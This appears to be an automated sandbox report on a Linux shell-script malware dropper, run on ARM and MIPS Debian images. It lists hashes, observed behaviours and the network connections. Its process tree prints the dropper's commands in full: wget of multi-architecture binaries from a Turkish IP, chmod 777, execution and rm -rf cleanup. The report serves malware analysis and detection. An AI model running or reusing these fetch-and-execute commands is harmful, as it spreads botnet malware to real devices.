/etc/cron.hourly/0
| MD5 | 3f006f7f81fc17be7f4a0d3da0fad5de |
| SHA1 | 97a94d3d0654c6551057af3809b52572bd7f9f5d |
| SHA256 | 982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf |
| SHA512 | 97d2ac0057427b940ada7c0fc805c1966e2535c3c3767ca85fef4a7e0fdc9d4ef9eb133530408b1e439df067881cb317e948ad9bfd487e958a04c97d9db978e0 |
/tmp/fileJho6MR
| MD5 | 6f344240f3686c40e24f9bb30af5bd93 |
| SHA1 | f3b470c47d9a74c91097836be07f7fc51fd977d6 |
| SHA256 | c1d8a7ed1e88ccc6ac4bd7002b2f9279031c82f45bf8e6f33aaa87602b1d8365 |
| SHA512 | 187ac80956d59e6d5ef0d5b43a4c6c2faf94a4734e834f475421da103b4542571d6928bbbf3a8da0349578985bfefd3175fc908d8a1778f2b6311bb1fe7a1c39 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-02 05:54
Reported
2024-07-02 05:56
Platform
debian9-armhf-20240418-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.arm6 | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.ppc | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.ppc | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.arm4 | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.arm6 | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.ppc | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.ppc | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.arm4 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/qkdjdjj22.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc.1 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm4 | /usr/bin/wget | N/A |
Processes
/tmp/qkdjdjj22.sh
[/tmp/qkdjdjj22.sh]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mips]
/bin/chmod
[chmod 777 qkdjdjj22.mips]
/tmp/qkdjdjj22.mips
[./qkdjdjj22.mips]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mpsl]
/bin/chmod
[chmod 777 qkdjdjj22.mpsl]
/tmp/qkdjdjj22.mpsl
[./qkdjdjj22.mpsl]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.sh4]
/bin/chmod
[chmod 777 qkdjdjj22.sh4]
/tmp/qkdjdjj22.sh4
[./qkdjdjj22.sh4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x86]
/bin/chmod
[chmod 777 qkdjdjj22.x86]
/tmp/qkdjdjj22.x86
[./qkdjdjj22.x86]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm6]
/bin/chmod
[chmod 777 qkdjdjj22.arm6]
/tmp/qkdjdjj22.arm6
[./qkdjdjj22.arm6]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x32]
/bin/chmod
[chmod 777 qkdjdjj22.x32]
/tmp/qkdjdjj22.x32
[./qkdjdjj22.x32]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.i586]
/bin/chmod
[chmod 777 qkdjdjj22.i586]
/tmp/qkdjdjj22.i586
[./qkdjdjj22.i586]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.m68k]
/bin/chmod
[chmod 777 qkdjdjj22.m68k]
/tmp/qkdjdjj22.m68k
[./qkdjdjj22.m68k]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm4]
/bin/chmod
[chmod 777 qkdjdjj22.arm4]
/tmp/qkdjdjj22.arm4
[./qkdjdjj22.arm4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm5]
/bin/rm
[rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86]
Network
| Country | Destination | Domain | Proto |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp |
Files
memory/686-1-0xb6718000-0xb6729044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-02 05:54
Reported
2024-07-02 05:56
Platform
debian9-mipsbe-20240611-en
Max time kernel
147s
Max time network
153s
Command Line
Signatures
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.mips | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.mips | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/qkdjdjj22.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc.1 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mips | /usr/bin/wget | N/A |
Processes
/tmp/qkdjdjj22.sh
[/tmp/qkdjdjj22.sh]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mips]
/bin/chmod
[chmod 777 qkdjdjj22.mips]
/tmp/qkdjdjj22.mips
[./qkdjdjj22.mips]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mpsl]
/bin/chmod
[chmod 777 qkdjdjj22.mpsl]
/tmp/qkdjdjj22.mpsl
[./qkdjdjj22.mpsl]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.sh4]
/bin/chmod
[chmod 777 qkdjdjj22.sh4]
/tmp/qkdjdjj22.sh4
[./qkdjdjj22.sh4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x86]
/bin/chmod
[chmod 777 qkdjdjj22.x86]
/tmp/qkdjdjj22.x86
[./qkdjdjj22.x86]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm6]
/bin/chmod
[chmod 777 qkdjdjj22.arm6]
/tmp/qkdjdjj22.arm6
[./qkdjdjj22.arm6]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x32]
/bin/chmod
[chmod 777 qkdjdjj22.x32]
/tmp/qkdjdjj22.x32
[./qkdjdjj22.x32]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.i586]
/bin/chmod
[chmod 777 qkdjdjj22.i586]
/tmp/qkdjdjj22.i586
[./qkdjdjj22.i586]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.m68k]
/bin/chmod
[chmod 777 qkdjdjj22.m68k]
/tmp/qkdjdjj22.m68k
[./qkdjdjj22.m68k]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm4]
/bin/chmod
[chmod 777 qkdjdjj22.arm4]
/tmp/qkdjdjj22.arm4
[./qkdjdjj22.arm4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm5]
/bin/rm
[rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86]
Network
| Country | Destination | Domain | Proto |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp | |
| TR | 195.85.205.47:777 | tcp |